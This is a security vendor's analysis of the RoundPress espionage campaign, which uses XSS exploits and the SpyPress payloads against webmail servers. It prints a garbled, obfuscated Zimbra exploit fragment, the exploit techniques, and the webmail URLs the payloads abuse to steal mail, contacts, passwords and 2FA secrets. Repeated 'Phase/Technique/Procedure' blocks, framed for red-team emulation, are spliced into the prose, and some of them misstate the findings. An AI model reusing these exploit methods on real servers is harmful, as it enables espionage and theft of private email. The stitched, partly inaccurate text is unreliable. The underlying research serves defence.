Operation RoundPress targeting high-value webmail servers Matthieu Faou This blogpost introduces an operation that we named RoundPress, targeting high-value webmail servers with XSS vulnerabilities, and that we assess with medium confidence is run by the Sednit cyberespionage group. The ultimate goal of this operation is to steal confidential data from specific email accounts. Key points of this blogpost: In Operation RoundPress, the compromise vector is a spearphishing email leveraging an XSS vulnerability to inject malicious JavaScript code into the victim’s webmail page. In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra. For MDaemon, Sednit used a zero-day XSS vulnerability. We reported the vulnerability to the developers on November 1st, 2024 and it was patched in version 24.5.1. Most victims are governmental entities and defense companies in Eastern Europe, although we have observed governments in Africa, Europe, and South America being targeted as well. We provide an analysis of the JavaScript payloads SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. These payloads are able to steal webmail credentials, and exfiltrate contacts and email messages from the victim’s mailbox. Additionally, SpyPress.MDAEMON is able to set up a bypass for two-factor authentication. Sednit profile The Sednit group – also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy – has been operating since at least 2004. The US Department of Justice named the group as one of those responsible for the Democratic National Committee (DNC) hack just before the 2016 US elections and linked the group to the GRU. The group is also presumed to be behind the hacking of global television network TV5Monde, the World Anti-Doping Agency (WADA) email leak, and many other incidents. Sednit has a diversified set of malware tools in its arsenal, several examples of which we have documented previously in our Sednit white paper from 2016. Links to Sednit On September 29th, 2023, we detected a spearphishing email, part of Operation RoundPress, sent from katecohen1984@portugalmail[.]pt (envelope-from address). The email exploited CVE-2023-43770 in Roundcube. This email address is very similar to the ones used in other Sednit campaigns in 2023, as documented by Unit42 for example. Leveraging a network scan we ran in February 2022, we found the server 45.138.87[.]250 / ceriossl[.]info, which was configured in the same unique way as 77.243.181[.]238 / global-world-news[.]net. The former was mentioned in a Qianxin blogpost describing a campaign abusing CVE-2023-23397 that attributed it to Sednit. The latter is a domain used in Operation RoundPress in 2023. Given these two elements, we believe with medium confidence that Operation RoundPress is carried out by Sednit. Victimology Table 1 and Figure 1 detail targets of Operation RoundPress in 2024, from ESET telemetry and two samples on VirusTotal. Most of the targets are related to the current war in Ukraine; they are either Ukrainian governmental entities or defense companies in Bulgaria and Romania. Notably, some of these defense companies are producing Soviet-era weapons to be sent to Ukraine. Other targets include African, EU, and South American governments. Table 1. Operation RoundPress victims in 2024 Date Country Sector 2024-05 Greece National government. Romania Unknown (VirusTotal submission). Ukraine Specialized Prosecutor’s Office in the Field of Defense of the Western Region (VirusTotal submission). 2024-06 Bulgaria Telecommunications for the defense sector. Cameroon National government. Ukraine Military. 2024-07 Ecuador Military. Ukraine Regional government. Serbia National government. 2024-09 Cyprus An academic in environmental studies. Romania Defense company. Ukraine Military. 2024-10Bulgaria Defense company. 2024-11 Bulgaria Defense company (not the same as in 2024-10). UkraineCivil air transport company. Defense company. 2024-12Ukraine State company in the transportation sector. Figure 1. Map of operation RoundPress victims in 2024 Compromise chainInitial access

Phase: Initial Access

• Technique: Spearphishing with XSS Exploitation
• Procedure: The attacker sends a spearphishing email exploiting an XSS vulnerability to inject malicious JavaScript into the victim's webmail page.

Phase: Execution

• Technique: JavaScript Execution in Webmail Context
• Procedure: The malicious JavaScript payloads (e.g., SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA) execute within the context of the webmail application.

Phase: Credential Access

• Technique: Credential Harvesting via JavaScript
• Procedure: The JavaScript payload captures webmail credentials from the logged-in user session.

Phase: Collection

• Technique: Email and Contacts Exfiltration
• Procedure: The payload exfiltrates email messages and contacts from the victim’s mailbox back to the threat actor.

Phase: Persistence

• Technique: Two-Factor Authentication Bypass (SpyPress.MDAEMON)
• Procedure: The SpyPress.MDAEMON payload sets up a bypass for two-factor authentication to maintain access.

This structured representation outlines the steps and techniques used by the threat actor in Operation RoundPress, focusing on actions relevant for a red team emulation.

In 2023, Sednit was exploiting CVE-2020-35730, a known XSS vulnerability in Roundcube (see this CERT-UA blogpost and this Recorded Future report), which enables the loading of arbitrary JavaScript code in the context of the webmail window. In 2024, we observed different XSS vulnerabilities being used to target additional webmail software: Horde, MDaemon, and Zimbra. Sednit also started to use a more recent vulnerability in Roundcube, CVE-2023-43770. The MDaemon vulnerability (CVE-2024-11182, now patched) was a zero day, most likely discovered by Sednit, while the ones for Horde, Roundcube, and Zimbra were already known and patched. Sednit sends these XSS exploits by email. The exploits lead to the execution of malicious JavaScript code in the context of the webmail client web page running in a browser window. Therefore, only data accessible from the victim’s account can be read and exfiltrated. Note that, in order for the exploit to work, the target must be convinced to open the email message in the vulnerable webmail portal. This means that the email needs to bypass any spam filtering and the subject line needs to be convincing enough to entice the target into reading the email message. Figure 2 summarizes the compromise chain used in Operation RoundPress. Figure 2. Operation RoundPress compromise chain Generally, the email message looks benign and contains text about news events. For example, on September 11th, 2024, a Ukrainian target received a phishing email from kyivinfo24@ukr[.]net with the subject СБУ схопила банкіра, який працював на ворожу воєнну розвідку в Харкові (machine translation: SBU arrested a banker who worked for enemy military intelligence in Kharkiv). The message body – see Figure 3 – contains excerpts (in Ukrainian) and links to articles from Kyiv Post, a well-known newspaper in Ukraine. The malicious code that triggers the XSS vulnerability is inside the HTML code of the email message’s body and is not directly visible to the user. Figure 3. Malicious email message sent by Sednit Another example is an email from office@terembg[.]com to a Bulgarian target on November 8th, 2024, with the subject Путин се стреми Тръмп да приеме руските условия вдвустранните отношения (machine translation: Putin seeks Trump’s acceptance of Russian conditions in bilateral relations). The message body – see Figure 4 – again contains excerpts (in Bulgarian) and links to articles from News.bg, a legitimate Bulgarian newspaper.

Phase: Initial Access

• Technique: Phishing via Malicious Email Exploiting XSS Vulnerabilities
• Procedure: Sednit sends phishing emails containing malicious HTML exploiting XSS vulnerabilities in webmail software such as Roundcube (CVE-2020-35730, CVE-2023-43770), Horde, MDaemon (CVE-2024-11182), and Zimbra. The HTML contains JavaScript to execute in the context of the victim's webmail session, leading to data access and exfiltration that is accessible from the user’s account.

Phase: Execution

• Technique: Malicious JavaScript Execution via XSS
• Procedure: The JavaScript is embedded within the HTML body of the email. When the user opens the email in the vulnerable webmail client, the JavaScript executes within the browser session, leveraging the XSS vulnerability to gain access to user data.

Phase: Exfiltration

• Technique: User Data Exfiltration via XSS
• Procedure: Once the JavaScript executes in the context of the user's webmail session, it reads and exfiltrates accessible data to the attacker's controlled infrastructure. This data is limited to what the email account has access to at the time of execution.

Figure 4. Another malicious email sent by Sednit Note that some of these vulnerabilities are not of interest exclusively to this group: GreenCube (also known as UNC3707) and Winter Vivern have been exploiting them as well. Horde: Unknown exploit For targets using Horde webmail, we have seen Sednit using an old vulnerability. We were unable to find the exact vulnerability, but it appears to be an XSS flaw that was already fixed in the first version of Xss.php committed to GitHub, and in Horde Webmail 1.0, which was released in 2007. The intended exploit used by Sednit is shown in Figure 5. Placing malicious JavaScript code in the onerror attribute of an img element is a technique taken straight from the XSS playbook: because the src attribute is x, an undefined value, onerror is called and the payload is base64 decoded and then evaluated using window.parent.eval. Figure 5. Horde webmail exploit In Horde Webmail version 1.0, the XSS filter removes the style elements and the on* attributes, such as onerror. Thus, we believe that Sednit made a mistake and tried to use a nonworking exploit. MDaemon: CVE-2024-11182 On November 1st, 2024, we detected an email message sent to two Ukrainian state-owned defense companies and a Ukrainian civil air transport company. This message exploited a zero-day XSS vulnerability in MDaemon Email Server, in the rendering of untrusted HTML code in email messages. We reported the vulnerability to the developers on November 1st, 2024 and it was patched in version 24.5.1, which was released on November 14th, 2024; we then issued CVE-2024-11182 for it. The exploit used by Sednit is shown in Figure 6. Just as for Horde, it relies on a specially crafted img element, but uses a bug in the MDaemon HTML parser where a noembed end tag inserted within the title attribute of a p element tricks the parser into rendering the immediately succeeding img tag. Figure 6. Exploit for CVE-2024-11182 in MDaemon Roundcube: CVE-2023-43770 For targets using Roundcube webmail: in 2023, Sednit used the XSS vulnerability CVE-2020-35730, while in 2024, it switched to CVE-2023-43770. The more recent vulnerability was patched on September 14th, 2023 in this GitHub commit. The fix is in a regex in the rcube_string_replacer.php script. The exploit used by Sednit is quite simple and is depicted in Figure 7. Figure 7. Exploit for CVE-2023-43770 in Roundcube In rcube_string_replacer.php, URLs are converted to hyperlinks, and the hyperlink text is what is expected to be provided between the outer set of square brackets. The bug lies in the fact that the hyperlink text is not properly sanitized, allowing the characters < and >. This enables an attacker to provide JavaScript code contained between , which is directly added to the page when the email is rendered in Roundcube. Zimbra: CVE-2024-27443 / ZBUG-3730 For Zimbra, Sednit uses CVE-2024-27443 (also tracked as ZBUG-3730). It was patched on March 1st, 2024 in this GitHub commit, in the ZmInviteMsgView.js file. The vulnerability lies in failing to sanitize the cif (calendar intended for) attribute, in a calendar invitation sent by email. The cif attribute is populated from the email header X-Zimbra-Calendar-Intended-For. Before the patch, the value was directly added to the Zimbra HTML page without sanitization. This allowed the execution of malicious JavaScript code in the context of the webmail browser window. The exploit code that we found in this header is the following: Zimbra Calendar(function(tmz){ghwa='cxe';return 'klzzwxh:0000x65'+decodeURI('%76')+'klzzwxh:0001x61klzzwxh:0002x6c'})()+'\t'+decodeURI('%6F')+'\\x62'; oykbg='doix'; return kqd})()](frames[0].document.getElementById('a-cashed-skinLayout2')['\inn\e\r\T\e\xt']))\"> The beautified code contained in the onerror attribute is: window'eval'['innerText'])) Basically, this reads the text contained in a div element, identified by ID a-cashed-skinLayout2, that is present in the body of the calendar invite. This div element uses the style attribute with the value display:none so that it is not visible to the target. The inner text contains base64-encoded JavaScript code that is run using eval. Persistence The JavaScript payloads (SpyPress) loaded by the XSS vulnerabilities don’t have true persistence, but they are reloaded every time the victim opens the malicious email. In addition, we detected a few SpyPress.ROUNDCUBE payloads that have the ability to create Sieve rules. SpyPress.ROUNDCUBE creates a rule that will send a copy of every incoming email to an attacker-controlled email address. Sieve rules are a feature of Roundcube and therefore the rule will be executed even if the malicious script is no longer running. Credential access All SpyPress payloads have the ability to steal webmail credentials by trying to trick the browser or password manager to fill webmail credentials into a hidden form. In addition, some samples also try to trick the victim by logging them out of their webmail account and displaying a fake login page. Collection and exfiltration Most SpyPress payloads collect email messages and contact information from the victim’s mailbox. The data is then exfiltrated via an HTTP POST request to a hardcoded C&C server. Toolset In 2024, we have observed Sednit using four payloads in Operation RoundPress: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. They are injected into the victims’ webmail context using XSS vulnerabilities, as explained above.

Phase: Initial Access

• Technique: Phishing via Malicious Email
• Procedure: Sednit sends malicious emails exploiting vulnerabilities in various webmail services like Horde, MDaemon, Roundcube, and Zimbra. These emails contain crafted HTML to exploit XSS flaws.

Phase: Execution

• Technique: XSS Exploitation
• Horde Webmail (Unknown Exploit): Malicious JavaScript is inserted in the onerror attribute of an img tag to execute payloads via window.parent.eval.
• MDaemon (CVE-2024-11182): An img tag is improperly rendered by using a noembed end tag within a title attribute to execute JavaScript.
• Roundcube (CVE-2023-43770): Unsanitized < and > characters in hyperlinks allow execution of JavaScript code.
• Zimbra (CVE-2024-27443 / ZBUG-3730): Malicious JavaScript is executed using the unsanitized cif attribute in calendar invites.

Phase: Persistence

• Technique: Sieve Rules Creation
• Procedure: SpyPress.ROUNDCUBE payloads create Sieve rules to forward incoming emails to an attacker-controlled address, maintaining access without active scripts.

Phase: Credential Access

• Technique: Webmail Credential Theft
• Procedure: SpyPress payloads attempt to steal credentials by tricking browsers or password managers to autofill hidden forms and logging users out to display a fake login page.

Phase: Collection and Exfiltration

• Technique: Data Collection and Exfiltration
• Procedure: SpyPress payloads collect emails and contact information, exfiltrating data via HTTP POST requests to a C2 server.

Toolset

• Payloads Used:
• SpyPress.HORDE
• SpyPress.MDAEMON
• SpyPress.ROUNDCUBE
• SpyPress.ZIMBRA
  These are delivered through XSS vulnerabilities in webmail contexts.

The four payloads have common characteristics. All are similarly obfuscated, with variable and function names replaced with random-looking strings – see Figure 8. Furthermore, strings used by the code, such as webmail and C&C server URLs, are also obfuscated and contained in an encrypted list. Each of those strings is only decrypted when it is used. Note that the variable and function names are randomized for each sample, so the final SpyPress payloads will have different hashes. Figure 8. Obfuscation of the JavaScript code Another common characteristic is that there are no persistence or update mechanisms. The payload is fully contained in the email and only executed when the email message is viewed from a vulnerable webmail instance. Finally, all payloads communicate with their hardcoded C&C servers via HTTP POST requests. There is a small number of C&C servers that are shared by all payloads (there is no separation by victim or payload type). SpyPress.HORDE SpyPress.HORDE is the JavaScript payload injected into vulnerable Horde webmail instances. Once deobfuscated, and functions and variables are manually renamed, it reveals its main functionality: collecting and exfiltrating user credentials. Capabilities To steal credentials, as shown in Figure 9, SpyPress.HORDE creates two HTML input elements: horde_user and horde_pass. Their width and opacity are set to 0%, ensuring that they are not visible to the user. The goal is to trick browsers and password managers into filling those values. Note that a callback for the change event is created on the input horde_pass. This calls the function input_password_on_change as soon as the input element loses focus after its value is changed. Figure 9. SpyPress.HORDE credential stealer Then, input_password_on_change exfiltrates the data by calling C2_POST_Request, as can be seen in Figure 10.

Phase: Initial Access

• Technique: Injection into Webmail
• Procedure: The threat actor targets vulnerable Horde webmail instances and injects a JavaScript payload.

Phase: Execution

• Technique: Obfuscated JavaScript Execution
• Procedure: JavaScript payload is embedded in an email and executed when the email is viewed in a vulnerable webmail instance. It uses obfuscation with randomized variable and function names.

Phase: Credential Access

• Technique: HTML Input Field Manipulation
• Procedure:
• Action: Creates HTML input elements with id="horde_user" and id="horde_pass".

• Action: Sets width and opacity of elements to 0% to hide them from the user.

• Technique: Automatic Browser and Password Manager Interaction

• Procedure:
• Action: Constructs a callback for the change event on horde_pass to trigger when the input loses focus and changes value.
• Action: Calls input_password_on_change function when triggered.

Phase: Exfiltration

• Technique: HTTP POST Exfiltration
• Procedure:
• Action: The input_password_on_change function calls C2_POST_Request to exfiltrate credential data via HTTP POST to C&C servers.

Note: This attack flow does not employ persistence or update mechanisms, relying on real-time execution during email viewing.

Network protocol The C&C URL is hardcoded in the script (see Figure 10) and the exfiltration is done via an HTTPS POST request. The body data has a specific format that is sent base64 encoded. For example, bWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk decodes to: me@victim.org :: px myusername mypassword where px probably means password exfiltration. Note that the HTTP request is made by the victim’s browser, so HTTP headers such as the User-Agent will vary from victim to victim. Figure 10. SpyPress.HORDE data exfiltration SpyPress.MDAEMON SpyPress.MDAEMON is a JavaScript payload injected into vulnerable MDaemon webmail instances. Once deobfuscated, it reveals more functionality than what was implemented in SpyPress.HORDE: credential stealing (very similar to the SpyPress.HORDE implementation), exfiltration of contacts and login history, exfiltration of email messages, exfiltration of the two-factor authentication secret, and creation of an App Password, which enables attackers to access the mailbox from a mail application and to bypass 2FA protection. Capabilities Credential stealer The credential stealer of SpyPress.MDAEMON is almost identical to that of SpyPress.HORDE – see Figure 11. The only difference is the name of the input fields, which are User and Password, to match the official names used in the MDaemon software. Figure 11. SpyPress.MDAEMON credential stealer Contacts and login history SpyPress.MDAEMON obtains the victim’s login history from https:///WorldClient.dll?Session=&View=Options-Authentication&GetLoginHistory=Yes, and exfiltrates the content to the hardcoded C&C server. It uses the same function used in the credential stealer part to send an HTTP POST request to the C&C server, but instead of px, it uses ab as the message type. Then, as shown in Figure 12, the script obtains the victim’s contact list from https:///WorldClient.dll?Session=&View=Contacts. This list, and the associated email addresses (in the eml JavaScript property), are then exfiltrated to the C&C server.

Phase: Initial Access

• Technique: Exploitation of Vulnerability in MDaemon Webmail
• Procedure: Attackers inject a JavaScript payload into vulnerable MDaemon webmail instances.

Phase: Execution

• Technique: JavaScript Payload Execution
• Procedure: The injected payload executes in the victim's webmail session, enabling further actions.

Phase: Credential Access

• Technique: Credential Stealing via Web Form
• Procedure: The payload extracts credentials by focusing on "User" and "Password" fields to match MDaemon's form naming conventions.

Phase: Collection

• Technique 1: Gathering Login History

• Process: The payload accesses login history by retrieving data from URLs such as:
  https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=Options-Authentication&GetLoginHistory=Yes

• Technique 2: Contact List Collection

• Process: Obtains contact list from:
  https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=Contacts

Phase: Exfiltration

• Technique: Exfiltration Over C2 Channel
• Procedure: Exfiltration of data is conducted via HTTPS POST requests to a hardcoded C2 server.
• Credential Data Format: Encoded in base64, with a type identifier "px".
• Login History and Contact List Format: Similar function as credential theft but uses "ab" as the type identifier.

Phase: Impact

• Technique: App Password Creation for Mail Access
• Procedure: The payload generates an App Password to enable access to the mailbox and bypass two-factor authentication (2FA).

Figure 12. Exfiltration of login history and contacts Email message exfiltration SpyPress.MDAEMON browses the victim’s mailbox folders, as shown in Figure 13, and filters out a hardcoded list of folders the attackers are not interested in: calendar, notes, documents, contacts, tasks, allowed senders, and blocked senders. Figure 13. SpyPress.MDAEMON browses the victim’s mailbox folders Then, for each folder, as shown in Figure 14, SpyPress.MDAEMON iterates over the pages and then over all messages in each page, before exfiltrating each email to the C&C server. To get a list of email messages in a given folder page, SpyPress.MDAEMON fetches https:///WorldClient.dll? Session=&View=List&ReturnJavaScript=1&FolderID=&Sort=RevDate&Page=&UTF8=1. Then, it iterates over this list and fetches https:///WorldClient.dll?Session=& View=Message&Source=Yes&Number=&FolderId= to get the source of each email. Finally, the email source is exfiltrated via an HTTP POST request to the C&C server, using the message type mail--. An HTTP POST request is made for each exfiltrated email, and thus it will create a large amount of network traffic. Note that the script maintains a list of exfiltrated emails, thereby avoiding the exfiltration several times.

Phase: Collection

• Technique: Email Harvesting
• Procedure:
• SpyPress.MDAEMON browses victim's mailbox folders, excluding certain predefined folders like "calendar," "notes," "documents," and others.
• Fetch email list from a folder page using:
  https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=List&ReturnJavaScript=1&FolderID=<folder_ID>&Sort=RevDate&Page=<page>&UTF8=1

Phase: Exfiltration

• Technique: Exfiltration Over Web Service
• Procedure:
• For each email, fetch email source using:
  https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=Message&Source=Yes&Number=<email_ID>&FolderId=<folder_ID>
• Exfiltrate the email source via an HTTP POST request with a message type format mail-<folder_name>-<email_ID>.
• Maintain a list of exfiltrated emails to prevent redundancy and excessive network traffic.

Figure 14. SpyPress.MDAEMON exfiltrates all emails Also note that the obfuscator seems to have introduced errors in the script. In the function download_all_messages_from_folder, is_folder_limit is a real variable name that was left unobfuscated. However, it is not used anywhere in the code. Two-factor authentication secret SpyPress.MDAEMON exfiltrates the victim’s two-factor authentication secret – see Figure 15. It first fetches https:///WorldClient.dll?Session=&View=Options- Authentication&TwoFactorAuth=Yes&GetSecret=Yes to get the secret, and then sends it to the C&C server, using the message type 2fa. To view the secret, the password is required, which SpyPress.MDAEMON gets from the fake login form it created. This secret is equivalent to the QR code mentioned in MDaemon documentation and it can be used to register the account in an authentication app, to then generate a valid 2FA code for the victim’s account. Because SpyPress.MDAEMON acquires the password and the 2FA secret, attackers will be able to log into the account directly.

Phase: Credential Access

• Technique: Exfiltration of Two-Factor Authentication Secret
• Procedure: SpyPress.MDAEMON sends a request to https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=Options-Authentication&TwoFactorAuth=Yes&GetSecret=Yes to fetch the 2FA secret. It captures this secret using a fake login form to obtain the password.

Phase: Exfiltration

• Technique: Exfiltration Over C2 Channel
• Procedure: SpyPress.MDAEMON sends the captured 2FA secret to the C&C server, using a message type identified as "2fa."

Note: Due to obfuscation, certain code elements and variables, like is_folder_limit, remain unused or obscured. The attack flow involves obtaining authentication details to facilitate unauthorized account access.

Figure 15. SpyPress.MDAEMON exfiltrates the 2FA secret App Password creation In addition to stealing the 2FA secret, SpyPress.MDAEMON creates an App Password (see the documentation). This password can be used in an email client to send and receive messages, without having to enter the 2FA code, even if 2FA is activated for the account. Note that MDaemon webmail doesn’t seem to require a 2FA code to generate a new application password. As shown in Figure 16, SpyPress.MDAEMON fetches https:///WorldClient.dll?Session=&View=Options-Authentication&CreateAppPassword=1s to create a new application password. The reply is this password, which is exfiltrated to the C&C server with the message type create-app. In other words, this application password enables attackers to add the email account directly to their own email client. They can thereby keep access to the mailbox even if the main password of the victim’s account is changed or if the 2FA code is changed. Figure 16. SpyPress.MDAEMON creates an application password Network protocol SpyPress.MDAEMON uses the same network protocol as SpyPress.HORDE. SpyPress.ROUNDCUBE SpyPress.ROUNDCUBE is the JavaScript payload injected into vulnerable Roundcube webmail instances. Once deobfuscated, it reveals similar functionalities to what is implemented in SpyPress.MDAEMON: credential stealing, exfiltration of the address book and the about page, exfiltration of emails, and malicious Sieve rules. Capabilities

Phase: Credential Access

• Technique: 2FA Secret Stealing
• Procedure: SpyPress.MDAEMON exfiltrates the 2FA secret from the targeted email account.

Phase: Persistence

• Technique: Application Password Creation
• Command: SpyPress.MDAEMON executes a request to https://<webmail_URL>/WorldClient.dll?Session=<session_ID>&View=Options-Authentication&CreateAppPassword=1 to create an application password that bypasses 2FA requirements.

Phase: Collection

• Technique: Email Data Exfiltration
• Procedure: SpyPress.MDAEMON and SpyPress.ROUNDCUBE exfiltrate emails, address book, and the about page from compromised webmail instances.

Phase: Defense Evasion

• Technique: Malicious Sieve Rules
• Procedure: SpyPress.ROUNDCUBE injects JavaScript payloads into the vulnerable Roundcube webmail, implementing malicious Sieve rules to manipulate email handling.

Credential stealer The credential stealer of SpyPress.ROUNDCUBE has two features. The first one is almost identical to the credential stealer of SpyPress.HORDE and SpyPress.MDAEMON. The only difference is the name of the input fields, which are _user and _pass, to match the official names used in the Roundcube software. The second feature is slightly more intrusive. SpyPress.ROUNDCUBE creates an iframe, as shown in Figure 17, with the src attribute set to https:///?_task=logout&_token=. This logs the victim out, forcing them to reenter their credentials. SpyPress.ROUNDCUBE adds a callback on the submit button of the genuine login form. Finally, the credentials are exfiltrated to the hardcoded C&C server using the message type pax-fish. Figure 17. SpyPress.ROUNDCUBE creates an iframe to log out the victim Note that the CSRF token is retrieved from the variable rcmail.env.request_token. The rcmail global variable is managed and filled by the Roundcube instance, and accessible in the JavaScript context that SpyPress.ROUNDCUBE is running in. Exfiltration of the address book and the about page SpyPress.ROUNDCUBE fetches the address book at https:///?_task=addressbook&_source=0&_action=export&&_token= and sends the raw output to the C&C server. Similarly, SpyPress.ROUNDCUBE fetches the about page at https:///?_task=settings&_framed=1&_action=about and sends the raw output to the C&C server. That page contains information about the Roundcube version and the plugins installed, as shown in Figure 18. Figure 18. Example of Roundcube about page Email message exfiltration SpyPress.ROUNDCUBE starts the email exfiltration routine every 7,200 seconds (two hours). First, it gets the list of mailboxes from the global variable rcmail.env.mailboxes. Then, it iterates over all those mailboxes; for each of them, it iterates over the pages to get the email message IDs by fetching https:///? _task=mail&_action=list&_mbox=&_refresh=1&_remote=1&_page=. Note that SpyPress.ROUNDCUBE adds the HTTP header X-Roundcube-Request, which contains the CSRF token. Also note that there is a lower bound time hardcoded in the script, 6:02:03 am, October 1st, 2024 in the specific script sample we analyzed, and only emails more recent than this are exfiltrated. The source of each email message is fetched from https:///?_task=mail&_mbox=&_uid=&_action=viewsource and then exfiltrated to the C&C server. Note that if SpyPress.ROUNDCUBE has exfiltrated more than 150 emails in a row, it stops the exfiltration until the next execution of the email exfiltration routine (two hours later). This is probably done to limit the noise on the victim’s network and avoid detection. Malicious Sieve rules In some SpyPress.ROUNDCUBE samples, there is additional functionality related to Sieve rules – see Figure 19. SpyPress.ROUNDCUBE creates a rule that sends a copy of every incoming email message to an attacker-controlled email address (srezoska@skiff[.]com in this case). Skiff was a privacy-oriented email service that provided end-to-end encryption.

Phase: Credential Access

• Technique: Credential Stealing via Form Manipulation

• Procedure: The attacker modifies the login form to capture credentials by changing the input field names to _user and _pass to match Roundcube's official names.

• Technique: Forced Logout for Credential Capture

• Procedure: Creates an iframe to log the user out using:
  • Command: src="https://<webmail_URL>/?_task=logout&_token=<CSRF_token>"
• Procedure: Adds a callback on the submit button of the genuine login form to capture credentials upon re-entry.
• Exfiltration Method: Credentials exfiltrated using message type pax-fish.

Phase: Data Collection and Exfiltration

• Technique: Address Book Exfiltration
• Procedure: Fetches address book using:
  • Command: https://<webmail_URL>/?_task=addressbook&_source=0&_action=export&&_token=<CSRF_token>

• Exfiltration: Sends raw output to C&C server.

• Technique: Application Information Gathering

• Procedure: Gathers information from "About" page:
  • Command: https://<webmail_URL>/?_task=settings&_framed=1&_action=about

• Details: Includes Roundcube version and plugins information.

• Technique: Email Exfiltration

• Routine: Initiated every 7,200 seconds (2 hours).
• Procedure: Iterates over mailboxes and pages to retrieve email IDs:
  • Command: https://<webmail_URL>/?_task=mail&_action=list&_mbox=<mailbox_name>&_refresh=1&_remote=1&_page=<current_page>
• Procedure: Fetches email source for each message:
  • Command: https://<webmail_URL>/?_task=mail&_mbox=<mailbox>&_uid=<email_ID>&_action=viewsource
• Headers: Utilizes X-Roundcube-Request HTTP header with CSRF token.
• Limit: Stops after exfiltrating 150 emails to reduce detection risk.

Phase: Persistence

• Technique: Malicious Sieve Rule for Email Copying
• Procedure: Creates Sieve rule to send copies of incoming emails to an attacker-controlled email address.

Figure 19. SpyPress.ROUNDCUBE creates a malicious Sieve rule Network protocol SpyPress.ROUNDCUBE uses the same network protocol as SpyPress.HORDE. SpyPress.ZIMBRA SpyPress.ZIMBRA is the JavaScript payload injected into vulnerable Zimbra webmail instances. Once deobfuscated, it reveals similar functionalities to the previous payloads: credential stealing, exfiltration of contacts and settings, and exfiltration of email messages. Capabilities Credential stealer The credential stealer of SpyPress.ZIMBRA is almost identical to those of SpyPress.HORDE and SpyPress.MDAEMON. The only difference is the name of the input fields, which are username and password, to match the official names used in the Zimbra software. Exfiltration of contacts and settings SpyPress.ZIMBRA fetches the victim’s contact list by making a SOAP request to the Zimbra API endpoint https:///service/soap/SearchRequest. As shown in Figure 20, the search query is contained in a dictionary that it is sent to the Zimbra server in the body of a POST request. Finally, SpyPress.ZIMBRA exfiltrates the raw output to the C&C server.

Phase: Execution

• Technique: Malicious Code Injection
• Procedure: SpyPress.ZIMBRA is a JavaScript payload injected into vulnerable Zimbra webmail instances. It is deobfuscated to perform malicious actions such as credential stealing, exfiltration of contacts, and email messages.

Phase: Credential Access

• Technique: Input Field Credential Theft
• Procedure: The credential stealer is designed to match the Zimbra software’s input fields, capturing usernames and passwords.

Phase: Collection

• Technique: Data from Local System
• Command: SpyPress.ZIMBRA accesses and extracts data by making SOAP requests.
• Procedure: Performs a SOAP request to the Zimbra API endpoint, using https://<webmail_URL>/service/soap/SearchRequest with a search query in the POST request body to fetch the victim’s contact list.

Phase: Exfiltration

• Technique: Exfiltration Over C2 Channel
• Procedure: The raw output of contacts and settings is exfiltrated to the C&C server. This includes fetched contact lists and email messages.

Figure 20. SpyPress.ZIMBRA gets the victim’s contact list SpyPress.ZIMBRA also exfiltrates to the C&C server the content of the global variable ZmSetting, which contains various configuration and preference values. This is similar to SpyPress.ROUNDCUBE, which exfiltrates the about page. Email exfiltration Every 14,400 seconds (four hours), using the setInterval function, this payload starts its email exfiltration routine. As for the previous payloads, SpyPress.ZIMBRA first lists the folders, then iterates over the first 80 emails in each folder via a SOAP request to https:///service/soap/SearchRequest. For each message, the script fetches the source at https:///service/home/~/?auth=co&view=text&id= and then exfiltrates the email message source – see Figure 21.

Phase: Collection

• Technique: Email Collection via SOAP Requests
• Procedure:
• Every four hours, the malware uses JavaScript's setInterval function to initiate its routine.
• Lists email folders using a SOAP request.
• Iterates over the first 80 emails in each folder:
  • SOAP Request: https://<webmail_URL>/service/soap/SearchRequest
  • Fetches email source:
  • URL: https://<webmail_URL>/service/home/~/?auth=co&view=text&id=<email_ID>

Phase: Exfiltration

• Technique: Automated Data Exfiltration
• Procedure:
• Exfiltrates the email message source using the URLs retrieved in the collection phase.
• Sends the content of the global variable ZmSetting containing configuration and preference values to the C&C server.

Figure 21.SpyPress.ZIMBRA exfiltrates email messages Network protocol SpyPress.ZIMBRA uses the same network protocol as SpyPress.HORDE. Conclusion Over the past two years, webmail servers such as Roundcube and Zimbra have been a major target for several espionage groups such as Sednit, GreenCube, and Winter Vivern. Because many organizations don’t keep their webmail servers up to date and because the vulnerabilities can be triggered remotely by sending an email message, it is very convenient for attackers to target such servers for email theft. For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page. IoCs A comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository. Files SHA-1 Filename Detection Description 41FE2EFB38E0C7DD10E6009A68BD26687D6DBF4C N/A JS/Agent.RSO SpyPress.ZIMBRA. 60D592765B0F4E08078D42B2F3DE4F5767F88773 N/A JS/Exploit.Agent.NSH XSS exploit for CVE-2023-43770. 1078C587FE2B246D618AF74D157F941078477579 N/A JS/Exploit.Agent.NSH SpyPress.ROUNDCUBE. 8EBBBC9EB54E216EFFB437A28B9F2C7C9DA3A0FA N/A HTML/Phishing.Agent.GNZ XSS exploit for CVE-2024-11182. F95F26F1C097D4CA38304ECC692DBAC7424A5E8D N/A HTML/Phishing.Agent.GNZ SpyPress.MDAEMON. 2664593E2F5DCFDA9AAA1A2DF7C4CE7EEB1EDBB6 N/A JS/Agent.SJU Probable XSS exploit for Horde. B6C340549700470C651031865C2772D3A4C81310 N/A JS/Agent.SJU SpyPress.HORDE. 65A8D221B9ECED76B9C17A3E1992DF9B085CECD7 N/A HTML/Phishing.Gen SpyPress.ROUNDCUBE. 6EF845938F064DE39F4BF6450119A0CDBB61378C N/A N/A Email exploiting CVE-2023-43770, found on VirusTotal. 8E6C07F38EF920B5154FD081BA252B9295E8184D N/A JS/Agent.RSP SpyPress.ROUNDCUBE. 